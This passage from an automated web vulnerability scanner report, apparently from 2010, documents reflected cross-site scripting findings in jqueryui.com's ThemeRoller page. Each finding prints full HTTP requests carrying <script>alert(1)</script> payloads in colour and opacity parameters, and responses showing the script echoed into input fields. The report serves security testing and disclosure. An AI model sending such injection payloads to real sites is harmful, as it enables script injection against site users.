w=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityHover" class="opacity" value="70609e4\\\"><script>alert(1)</script>daa0a1be744" />
...[SNIP]...

1.146. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a26f7"><script>alert(1)</script>f7385104586 was submitted in the bgImgOpacityOverlay parameter. This input was echoed as a26f7\\\"><script>alert(1)</script>f7385104586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50a26f7"><script>alert(1)</script>f7385104586&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityOverlay" class="opacity" value="50a26f7\\\"><script>alert(1)</script>f7385104586" />
...[SNIP]...

1.147. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed46"><script>alert(1)</script>7837a54b6b5 was submitted in the bgImgOpacityShadow parameter. This input was echoed as 1ed46\\\"><script>alert(1)</script>7837a54b6b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=301ed46"><script>alert(1)</script>7837a54b6b5&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityShadow" id="bgImgOpacityShadow" class="opacity" value="301ed46\\\"><script>alert(1)</script>7837a54b6b5" />
...[SNIP]...

1.148. http://jqueryui.com/themeroller/_rollyourown.php [borderColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d57"><script>alert(1)</script>c3ae1d14c80 was submitted in the borderColorActive parameter. This input was echoed as 10d57\\\"><script>alert(1)</script>c3ae1d14c80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e10d57"><script>alert(1)</script>c3ae1d14c80&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorActive" id="borderColorActive" class="hex" value="655e4e10d57\\\"><script>alert(1)</script>c3ae1d14c80" size="6" />
...[SNIP]...

1.149. http://jqueryui.com/themeroller/_rollyourown.php [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3fb"><script>alert(1)</script>251ce226b67 was submitted in the borderColorContent parameter. This input was echoed as dc3fb\\\"><script>alert(1)</script>251ce226b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846bdc3fb"><script>alert(1)</script>251ce226b67&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorContent" id="borderColorContent" class="hex" value="8e846bdc3fb\\\"><script>alert(1)</script>251ce226b67" size="6" />
...[SNIP]...

1.150. http://jqueryui.com/themeroller/_rollyourown.php [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15983"><script>alert(1)</script>ee982da873b was submitted in the borderColorDefault parameter. This input was echoed as 15983\\\"><script>alert(1)</script>ee982da873b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d1940515983"><script>alert(1)</script>ee982da873b&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorDefault" id="borderColorDefault" class="hex" value="d1940515983\\\"><script>alert(1)</script>ee982da873b" size="6" />
...[SNIP]...

1.151. http://jqueryui.com/themeroller/_rollyourown.php [borderColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790f4"><script>alert(1)</script>345bd3673c8 was submitted in the borderColorError parameter. This input was echoed as 790f4\\\"><script>alert(1)</script>345bd3673c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d790f4"><script>alert(1)</script>345bd3673c8&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=